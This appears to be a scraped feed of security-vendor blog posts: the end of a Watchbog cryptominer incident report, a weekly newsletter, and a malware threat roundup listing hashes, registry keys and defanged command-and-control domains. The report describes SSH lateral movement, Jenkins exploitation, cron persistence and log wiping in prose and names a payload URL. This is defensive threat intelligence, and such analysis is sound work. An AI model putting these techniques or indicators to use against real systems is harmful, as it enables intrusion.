                The following Bash script was used to facilitate the lateral movement process. It retrieves the contents of the known_hosts file on the infected system and then attempts to SSH into those systems. It also checks for the existence of SSH keys and leverages them to authenticate to the systems in the known_hosts file. If successful, it will retrieve the contents of the Pastebin URL previously described and initiate the infection process.




                Lateral movement via Jenkins and Redis servers


                In addition to leveraging SSH for lateral movement, the Watchbog adversary also attempted to leverage a Python script that scans for open Jenkins and Redis ports on the host's subnet. If the script finds any vulnerable servers, it attempts to use the curl or wget commands to retrieve a payload from Pastebin and execute it on the target.

                Based on the following string on line 71, the script targets CVE-2018-1000861, a vulnerability in the Staple web framework for versions up to Jenkins 2.138.1 or 2.145 which handles HTTP requests. It can provide attackers with RCE through particularly crafted URLs. A post by Orange Tsai shows how to exploit this vulnerability by using cross reference objects to bypass ACL policy.



                Though the pastes accessed in the script were no longer available, we believe the payload was the installation script for the XMR-Stak miner previously described. The following Python script is also downloaded and executed from the XMR-Stak miner script described above in a function called 'party.'



                As can be seen above, the payload variable contains a base64 encoded blob which is then decoded and written to the /tmp directory and executes it. This base64 encoded blob contains a Pastebin URL (hXXps://pastebin[.]com/raw/DzgYb9mu) which was used to host the following Python script. The Python script is used to facilitate the exploitation of the aforementioned vulnerability and initiate the infection process. The following screenshots are associated with this Python script.







                Persistence


                Watchbog's main persistence mechanism appears to have been using cron jobs. Below is the 'system' function from the 'kerberods' installation script which ensures the dropper will call out to Pastebins every hour for new information. The below screenshot shows the way that Watchbog configures the cron jobs responsible for achieving persistence on infected systems.



                In a post by Renato Marinho from Morphus Labs, he mentions a very interesting way 'kerberods' achieves persistence as well. If it has root privileges, it will download and load a library into the operating system which hooks parts of Glibc to modify Glibc's behavior. The post also specifies that the hooks allow the miner to run as anyone (including root) and also obfuscates the network connection to the mining pool as well as the Redis/Jenkins server scans.

                Covering their tracks


                Evidence deletion has been identified in previous Watchbog variants. The Watchbog variant in our incident continued this trend. Evidence deletion was performed in a clear manner with files and logs being deleted or overwritten. The evidence deletion was typically added to the end of a handful of the Pastebin scripts, with the Xmr-stak download and the SSH Lateral Movement scripts being prime examples. The loss of those key pieces of evidence made analysis difficult, but not impossible. We were able to rely upon our clients centralized logging to fill in those holes, and the hosts themselves still had evidence. The most obvious being the malware variants themselves.

                Conclusion


                Unpatched web applications vulnerable to known CVEs are a major target for attackers. Adversaries can leverage the vulnerability to gain a foothold into the web server and network environment in which the web server is deployed. Once that foothold has been established, the attacker can then connect to their C2, achieve persistent long-term access to the environment and spread laterally — which is exactly what happened in this case. The best way to prevent such activity would be to ensure that all enterprise web applications are up to date. Patching can cause some operational gaps and delays, so it’s also important to have a maintenance window and a test environment to ensure that the new patches do not cause any issues. Identifying cryptomining activity can be done effectively by following security fundamentals. Establish a baseline for internal network traffic and if any significant deviations occur, identify and investigate them. Even if there is an existing theory for the activity. In this case, Watchbog generated a noticeable spike in the organization’s SSH traffic.

                Coverage

                Intrusion prevention systems such as SNORT® provide an effective tool to detect China Chopper activity due to specific signatures present at the end of each command. In addition to intrusion prevention systems, it is advisable to employ endpoint detection and response tools (EDR) such as Cisco AMP for Endpoints, which gives users the ability to track process invocation and inspect processes. Try AMP for free here.

                Additional ways our customers can detect and block these threats are listed below.



                Cisco Cloud Web Security (CWS) orWeb Security Appliance (WSA) web scanning prevents access to malicious websites and detects malware used in these attacks.

                Email Security can block malicious emails sent by threat actors as part of their campaign.

                Network Security appliances such asNext-Generation Firewall (NGFW), Next-Generation Intrusion Prevention System (NGIPS), and Meraki MX can detect malicious activity associated with this threat.

                AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

                Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

                Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

                Indicators of Compromise (IOCs)


                The following IOCs have been observed associated with Watchbog.

                Hashes (SHA256):


                b383d0fdfa5036ccfa5d9c2b43cbfd814bce8778978873057b86678e5295fc61 0b0567c9b45ea0a3ea4267001f0760ccdf2b8224fceaf8979d32fcceb2d6fb7a

                3A6271A90D0F6CC8A2D31D45D931E8401F13F7377932BA07D871DC42F252B9CA

                Domains:


                aziplcr72qjhzvin[.]onion[.]to

                Misc:


                Monero Wallet (Same wallet as the Alibaba Cloud Post)

                47k2wdnyyBoMT6N9ho5Y7uQg1J6gPsTboKP6JXfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7

                Threat Source newsletter (Sept. 12, 2019)

                $
                0
                0

                Newsletter compiled by Jon Munshaw.

                Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

                You’ve heard it a million times: Always patch. But in case you needed another example that it’s important, Cisco Incident Response took a deep dive into a recent wave of Watchbog infections they observed. In this post, IR breaks down why this infection occurred, and what you can learn from it. 

                Speaking of patching, it’s as good of a time as any to update all of your Microsoft products. The company released its latest security update as part of their monthly Patch Tuesday. Check out our breakdown of the most important vulnerabilities here and our Snort coverage here.

                Ever considered an “illustrious career in cybercrime?” Well, don’t do it. So says Craig on the latest Beers with Talos podcast where the guys talking about “hacking back” and Matt’s level of Twitter fame.

                We also have our weekly Threat Roundup, which you can find on the blog every Friday afternoon. There, we go over the most prominent threats we’ve seen (and blocked) over the past week.


                Upcoming public engagements with Talos

                Event: “DNS on Fire” at Virus Bulletin 2019
                Location: Novotel London West hotel, London, U.K.
                Date: Oct. 2 - 4
                Speaker: Warren Mercer and Paul Rascagneres
                Synopsis: In this talk, Paul and Warren will walk through two campaigns Talos discovered targeted DNS. The first actor developed a piece of malware, named “DNSpionage,” targeting several government agencies in the Middle East, as well as an airline. During the research process for DNSpionage, we also discovered an effort to redirect DNSs from the targets and discovered some registered SSL certificates for them. The talk will go through the two actors’ tactics, techniques and procedures and the makeup of their targets.

                Event: “It’s never DNS...It was DNS: How adversaries are abusing network blind spots” at SecTor
                Location: Metro Toronto Convention Center, Toronto, Canada
                Date: Oct. 7 - 10
                Speaker: Edmund Brumaghin and Earl Carter
                Synopsis: While DNS is one of the most commonly used network protocols in most corporate networks, many organizations don’t give it the same level of scrutiny as other network protocols present in their environments. DNS has become increasingly attractive to both red teams and malicious attackers alike to easily subvert otherwise solid security architectures. This presentation will provide several technical breakdowns of real-world attacks that have been seen leveraging DNS for a variety of purposes such as DNSMessenger, DNSpionage, and more.

                Cyber Security Week in Review

                • Some states’ departments of motor vehicles are selling driver’s license data to private companies, including private investigators. Many individuals registering for licenses do not read data agreements that allow states to turn around and sell their personal information. 
                • Some Chromebooks mistakenly alerted users that the devices were reaching their end-of-life. A small number of brand new devices, after a reboot, told the user to upgrade to newer hardware to receive the latest security update. Google has since fixed this bug. 
                • A new report outlines the first recorded cyber attack on the U.S. power grid. North American Electric Reliability Corp. says it lost visibility into a small portion of its grid due to a “cyber event” in March. 
                • The popular Wikipedia site went down across Europe and the Middle East due to a series of denial-of-service attacks. The actor behind the DDoS kept up their efforts for about three days. 
                • The U.S. filed criminal charges against a professor in Texas for allegedly stealing information on behalf of Chinese tech company Huawei. The same person had already been named in a civil suit surrounding these claims. 
                • Apple’s reputation as having the most secure mobile operating system has taken a hit over the past few weeks due to multiple vulnerabilities being disclosed. Security researchers say the company may have put too much faith into its own code in iOS and the Safari web browser.  
                • New emails show that the U.S. Drug Enforcement Agency was close to purchasing malware from Israel’s controversial NSO group. But the agreement was eventually called off due to the high cost. 
                • UNICEF, a well-known non-profit organization, mistakenly leaked the personal data of more than 8,000 users who had accessed its online portal. The non-profit sent the information in an email to 20,000 users, after which they disabled the portal for a short time. 
                • A now-closed payroll processing firm withdrew millions of dollars from some New Yorkers’ bank accounts — and the CEO is nowhere to be found. MyPayrollHR alerted customers two weeks ago that it would be shutting down, and this week took back a month’s worth of pay from employees who worked for those customers. 

                Notable recent security issues

                Title: Microsoft patches 19 critical bugs as part of security update  
                Description: Microsoft released its monthly security update this week, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 85 vulnerabilities, 19 of which are rated “critical," 65 that are considered "important" and one "moderate." There is also a critical advisory relating to the latest update to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft services and software, including the Jet Database Engine and the Hyper-V hypervisor.
                Snort SIDs: 51436 - 51438, 51445, 51446, 51449 - 51452, 51454 - 51457, 51463 - 51465, 51479 – 51483

                Title:Some NETGEAR routers vulnerable to DoS attacks  
                Description: The NETGEAR N300 line of wireless routers contains two denial-of-service vulnerabilities. The N300 is a small and affordable wireless router that contains the basic features of a wireless router. An attacker could exploit these bugs by sending specific SOAP and HTTP requests to different functions of the router, causing it to crash entirely. 
                Snort SIDs: 50040 (Written by Dave McDaniel)

                Most prevalent malware files this week

                SHA 256: 15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13 
                MD5: c24315b0585b852110977dacafe6c8c1
                Typical Filename: puls.exe
                Claimed Product: N/A
                Detection Name: W32.DoublePulsar:WNCryLdrA.22is.1201 

                SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
                MD5: 4a50780ddb3db16ebab57b0ca42da0fb
                Typical Filename: xme64-2141.exe
                Claimed Product: N/A 
                Detection Name: W32.7ACF71AFA8-95.SBX.TG

                SHA 256: 46b241e3d33811f7364294ea99170b35462b4b5b85f71ac69d75daa487f7cf08
                MD5: db69eaaea4d49703f161c81e6fdd036f
                Typical Filename: xme32-2141-gcc.exe
                Claimed Product: N/A
                Detection Name: W32.46B241E3D3-95.SBX.TG

                SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3 
                MD5: 47b97de62ae8b2b927542aa5d7f3c858 
                Typical Filename: qmreportupload
                Claimed Product: qmreportupload.exe
                Detection Name: Win.Trojan.Generic::in10.talos

                SHA 256: 093cc39350b9dd2630a1b48372abc827251a3d37bd88c35cea2e784359b457d7 
                MD5: 3c7be1dbe9eecfc73f4476bf18d1df3f
                Typical Filename: sayext.gif
                Claimed Product: N/A
                Detection Name: W32.093CC39350-100.SBX.TG 

                Threat Roundup for September 6 to September 13

                $
                0
                0
                Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Sept. 6 and Sept. 13. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

                As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

                For each threat described below, this blog post only lists 25 of the associated file hashes and up to 25 IOCs for each category. An accompanying JSON file can be found herethat includes the complete list of file hashes, as well as all other IOCs from this post. As always, please remember that all IOCs contained in this document are indicators, and one single IOC does not indicated maliciousness.
                The most prevalent threats highlighted in this roundup are:
                Threat NameTypeDescription
                Win.Dropper.Gh0stRAT-7155936-0 Dropper Gh0stRAT is a well-known family of remote access trojans designed to provide an attacker with complete control over an infected system. Capabilities include monitoring keystrokes, collecting video footage from the webcam, and uploading/executing follow-on malware. The source code for Gh0stRAT has been publicly available on the Internet for years, significantly lowering the barrier for actors to modify and reuse the code in new attacks.
                Doc.Downloader.Emotet-7155084-0 Downloader Emotet is a banking trojan that remains relevant due to its ability to evolve and bypass antivirus products. It is commonly spread via malicious email attachments and links.
                Win.Dropper.DarkComet-7154925-1 Dropper DarkComet and related variants are a family of remote access trojans designed to provide an attacker with control over an infected system. Capabilities of this malware include the ability to download files from a user's machine, mechanisms for persistence and hiding, and the ability to send back usernames and passwords from the infected system.
                Win.Virus.Expiro-7153559-0 Virus Expiro is a known file infector and information stealer that hinders analysis with anti-debugging and anti-analysis tricks.
                Win.Ransomware.Shade-7158472-0 Ransomware Shade, also known as Troldesh, is a ransomware family typically spread via malicious email attachments.
                Win.Packed.Tofsee-7150793-1 Packed Tofsee is multipurpose malware that features a number of modules used to carry out various activities, such as sending spam messages, conducting click fraud, mining cryptocurrency, and more. Infected systems become part of the Tofsee spam botnet and are used to send large volumes of spam messages in an effort to infect additional systems and increase the overall size of the botnet under the operator’s control.

                Threat Breakdown

                Win.Dropper.Gh0stRAT-7155936-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
                Value Name: Version
                24
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\BITS
                Value Name: Group
                24
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: Lostlove_K
                6
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\DEFGHI KLMNOPQR TUV
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB 1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ImagePath
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: DisplayName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: WOW64
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IJKLMN PQRSTUVW YAB
                Value Name: ObjectName
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Description
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS 1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Type
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: Start
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: ErrorControl
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: ImagePath
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\ABCDEF H QRS
                Value Name: DisplayName
                1
                MutexesOccurrences
                127.0.0.16
                Global\f75b8341-d3d4-11e9-a007-00501e3ae7b54
                k.ru9999.cc3
                45.114.11.1372
                www.ddostmd.com2
                www.3rbb.com2
                116.31.125.1471
                www.baidu.com1
                www.hkdcr.com1
                xiaoyuer3001.f3322.net1
                222.186.30.2111
                192.168.1.1071
                mm.zhangfanfan.com1
                shenxian2016.f3322.net1
                admin860129.f3322.net1
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                45[.]114[.]11[.]1372
                154[.]210[.]146[.]1382
                116[.]31[.]125[.]1471
                61[.]147[.]103[.]671
                222[.]186[.]30[.]2111
                23[.]238[.]148[.]741
                221[.]217[.]66[.]1221
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                k[.]ru9999[.]cc3
                www[.]3rbb[.]com2
                WWW[.]DDOSTMD[.]COM2
                WWW[.]HKDCR[.]COM1
                xiaoyuer3001[.]f3322[.]net1
                mm[.]zhangfanfan[.]com1
                shenxian2016[.]f3322[.]net1
                admin860129[.]f3322[.]net1
                Files and or directories createdOccurrences
                %ProgramFiles%\svchost.exe4

                File Hashes

                121441b204dbf7a02c8f4357452c99592ab9bdeb676089ccf1f24071f740251b 130abeb252c2a663ae691271f5d154722468d1b1b2ed23ef89d4fb9290fe081b 1326c0b36ad655c1653ce78e98204260ec8b9bddefa3cd8d2c620fab88b1a83c 25effefec15971bbe5714e37fd1f0e0e33298c691b61d04ed3af1b1359731a2b 287fcc0ae4a50e34215cfd084570d7b94ab4a3786b7260ad0b1167d1baa1a8b0 29a7a1457008f729066e21c378ea7c402fac80aa64619631565fb95a4d137652 2eb388113d650745686345acf88d32a44975e00764034875bd990aa5a80119ca 2f6d822e2ebeb0f94368b55c7c94a4f8a8b73b32214fe1f3fc5277da52411bf9 332a58814dc69a08873cc8bcbf3f8b8999dd2e7ea60ad47b635a7f735e3e85a5 47bac35158a06f748621847c0de60eab92db067f0cb95f798f0b342f508f1360 4805d4e36186da1bca0b0debf28a36ff772885f0b438d3924059ef3b9531b2ca 4de97329b8242136094b16a705fa15d3a4fe918d68b1f4f698b58ba1bcb16706 4ec20ea729ca18bed34a0dbcd2b65f049d0926ab9f94a5470bb24e600e771281 592ebcaa26bacc775420398933a0a9d63acdaa604f85805a3a3196d5a1a798ee 5f2336bb4321161e7115e63d08db836ef28be2df0cad4db9e6ce45ad3830c560 5f469e2248ae56e1077c2c87a1a15c2414352a94786845d3b65447d3ee23694d 626d4dc26ff7ec588635ad32e71fabeb8ad96887d24498ffa08a031e1e6a6bee 66db565cad627dde60e4f396ef1712f06d7b911670189ab21b870ecaada99531 681539e7da26b1130fdb65c581f5146067a51c3a42849874d6f7aa189209a754 682cf9935d0d19815becc05f3f1ed6931396f25ccf95b6deedf70a4ba94ba031 70d32abf71be74690a04ebfe9713e2287106964e46069612f37f4b0822dd8169 7b32dce1d5818551afd3efdbc3ba540c47b37942d12254fc26f16b5e3f50b96e 81f4af297381141ed4990b4837b0fb60385f29405b04df3a55d8953237aa1182 84df0240ad79f34c7172b8262ec0898e794d2448e43b1e0a577704c0b8ef40e5 8ec17725347ae019a5d5d00345ba283483797e8477bd23e98f59d8c6f3d37811
                *See JSON for more IOCs

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network Security N/A
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                Wsa N/A

                Screenshots of Detection

                AMP


                ThreatGrid




                Doc.Downloader.Emotet-7155084-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\AUTHROOT\CERTIFICATES\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
                Value Name: Blob
                14
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                192[.]185[.]157[.]19114
                152[.]160[.]245[.]714
                104[.]27[.]137[.]4812
                104[.]27[.]136[.]4812
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                api[.]w[.]org14
                www[.]testrent[.]com14
                lackify[.]com14
                www[.]loris[.]al14
                financialdiscourse[.]com14
                fiberoptictestrentals[.]net14
                INDHRIGROUP[.]COM14
                loris[.]al14
                testrent[.]com14
                Files and or directories createdOccurrences
                %LOCALAPPDATA%\Microsoft\Schemas\MS Word_restart.xml14
                %HOMEPATH%\490.exe14

                File Hashes

                1157bbcfa2438b4142bc1dc163952714ef2e084cd27698f5c2f78193367f8033 3eaba85e842d0ed0489d430cb1bc37d1fca702845ba478a0e290115bebfd8827 64732ab1f700b865a24a0fe06e94a54a40724568af5381afd126096b59f18606 8ef79e33fc1ebf640f78cebe13485489f85caf08fbf4cee696aadb977f21d6e7 96ab8b7fc0b45cf2fc1277ad938ad4aabb1bcc157f0259e456b76f1684e4896e c177de169b84382b1809efd361d8e5a6ee6eff262f479724856686d03c6bb6db c707b20c85d03595b74a56768d69786c33076030059260a6684df7ac7b3a9562 cd75eda017abff329abfa5162be02c8042c86730dd948a6b423d3ebce5f5e3b8 e09474de88f323075c3ef4ba54c458e3275ee102b72a2bfc4894e79a9703c542 e192e2125ef244cff6787b3cba927d3e047fbd5d54dffd66d885a8c1789f2cde e79e52b33e81b6d039817aa3cf87726db6de496fcb36477f29483a5730dd2874 f256396752c6a4164b4097d493b202de43fb8f8d7bba372dcd7ba45ba3edfd16 f54ad758e4ee395a12956b665b611ad69b622e672d9f4086e8754f4b301cfb04 f679763abeea019bdfdc22e23d9be3159ca1f325453f34e94954bee50176664c

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                UmbrellaThis has coverage
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid


                Umbrella




                Win.Dropper.DarkComet-7154925-1

                Indicators of Compromise

                Registry KeysOccurrences
                <HKCU>\SOFTWARE\DC3_FEXEC 5
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINLOGON
                Value Name: UserInit
                4
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: EnableFirewall
                2
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\SHAREDACCESS\PARAMETERS\FIREWALLPOLICY\STANDARDPROFILE
                Value Name: DisableNotifications
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: EnableLUA
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: MicroUpdate
                2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Policies
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN
                Value Name: Policies
                2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM 2
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN 2
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: DisableTaskMgr
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\SECURITY CENTER
                Value Name: AntiVirusDisableNotify
                1
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
                Value Name: Start
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\SYSTEM
                Value Name: DisableRegistryTools
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{1Q4U2W04-714Q-L506-NR3K-B4MJ85W6X717}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{7F0I7VXB-063R-XLLO-731N-3EGO8NDEDVOR}
                Value Name: StubPath
                1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64} 1
                <HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\ACTIVE SETUP\INSTALLED COMPONENTS\{6C5V5081-L886-C7EB-2J6N-054ATGC34D64}
                Value Name: StubPath
                1
                <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN
                Value Name: System
                1
                <HKCU>\SOFTWARE\TGB61 1
                <HKCU>\SOFTWARE\TGB61
                Value Name: FirstExecution
                1
                <HKCU>\SOFTWARE\TGB61
                Value Name: NewIdentification
                1
                MutexesOccurrences
                DC_MUTEX-F3XDA2D5
                _x_X_BLOCKMOUSE_X_x_4
                _x_X_PASSWORDLIST_X_x_4
                _x_X_UPDATE_X_x_4
                DCPERSFWBP3
                ***MUTEX***2
                ***MUTEX***_SAIR2
                054ATGC34D641
                \BaseNamedObjects\054ATGC34D64_SAIR1
                IP Addresses contacted by malware. Does not indicate maliciousnessOccurrences
                193[.]161[.]193[.]992
                92[.]44[.]166[.]321
                81[.]214[.]120[.]2141
                88[.]229[.]213[.]1181
                176[.]219[.]165[.]91
                Domain Names contacted by malware. Does not indicate maliciousnessOccurrences
                hackroot00[.]ddns[.]net1
                berkeaksoy-45595[.]portmap[.]host1
                metin2ci[.]duckdns[.]org1
                toxicwithahmet[.]duckdns[.]org1
                denememusareis[.]duckdns[.]org1
                blackhamdsnh[.]duckdns[.]org1
                bluejeans067-51471[.]portmap[.]io1
                Files and or directories createdOccurrences
                %APPDATA%\dclogs5
                %TEMP%\XX--XX--XX.txt3
                %TEMP%\UuU.uUu3
                %TEMP%\XxX.xXx3
                %APPDATA%\logs.dat3
                %HOMEPATH%\Documents\MSDCSC2
                %HOMEPATH%\Documents\MSDCSC\msdcsc.exe2
                %System32%\MSDCSC\msdcsc.exe1
                %SystemRoot%\SysWOW64\MSDCSC1
                %ProgramData%\Microsoft\Windows\Start Menu\MSDCSC1
                %ProgramData%\Microsoft\Windows\Start Menu\MSDCSC\msdcsc.exe1
                \dir1
                \dir\install1
                \dir\install\install1
                \dir\install\install\server.exe1
                %SystemRoot%\SysWOW64\install1
                %SystemRoot%\SysWOW64\install\server.exe1
                %SystemRoot%\SysWOW64\MSDCSC\msdcsc.exe1
                %HOMEPATH%1
                %HOMEPATH%\Desktop1
                %HOMEPATH%\Desktop\Yeni klasör1
                %HOMEPATH%\Desktop\Yeni klasör\install1
                %HOMEPATH%\Desktop\Yeni klasör\install\server.exe1
                %TEMP%\YOUS2.DCP1
                %TEMP%\SDQWEQ.EXE1
                *See JSON for more IOCs

                File Hashes

                08c0ff2a95d50cd94b1f5f58b3af99091d27490f949c0d3c68dbc81dec5f9171 190b08b1337d404696b0c91f0442d31149080c97b7a6fe13cf879b1a4ead4c94 3f74c0ebf0701b6726ddb4fdc6ddb15610d0075691b02e9615c50e095359b6c2 4627deb7f9e82a06051ba5594b681756003b97c5a9fadec91ec4af3d9ac9ed72 54ade3e9aa6cc71cb769eb69a65110f5fa5cdac93cbf20b82609b996bfaf76ca 611d5155f8e505c20f5d1e2bb70b37b84d7de3458577d89cc32dc12f0351ec95 988e7312821405d692b5b5846be7ede45f0d8bd23c914385a737efa0400f2bad 9cb46d011f79a6db1c6baef5b9cae3020166a515dff284fcd6ea2fb51da1cf1d a5f9af2d94dd64d9c05e56d9560c386081823a69823d8609501f1506ab5d7a1a a919a95c83a233542e5da375487e6fabb1b81157c8f5bb372e12bebad910b170 e586a39a113c6c49b096ff19519e822f736d06c805a01eaed6adee2ab5a5836c f2ae8953fa9406d5f746ff92b94dfc1d0d09378f12372a71ef07c98f94167317

                Coverage

                ProductProtection
                AmpThis has coverage
                Cloudlock N/A
                CwsThis has coverage
                Email SecurityThis has coverage
                Network SecurityThis has coverage
                Stealthwatch N/A
                Stealthwatch Cloud N/A
                Threat GridThis has coverage
                Umbrella N/A
                WsaThis has coverage

                Screenshots of Detection

                AMP


                ThreatGrid




                Win.Virus.Expiro-7153559-0

                Indicators of Compromise

                Registry KeysOccurrences
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WSCSVC
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
                Value Name: Start
                18
                <HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER
                Value Name: HideSCAHealth
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WUAUSERV
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_32
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V2.0.50727_64
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_32
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\CLR_OPTIMIZATION_V4.0.30319_64
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
                Value Name: Type
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\COMSYSAPP
                Value Name: Start
                18
                <HKLM>\SYSTEM\CONTROLSET001\SERVICES\IDSVC
                Value Name: Type
                18
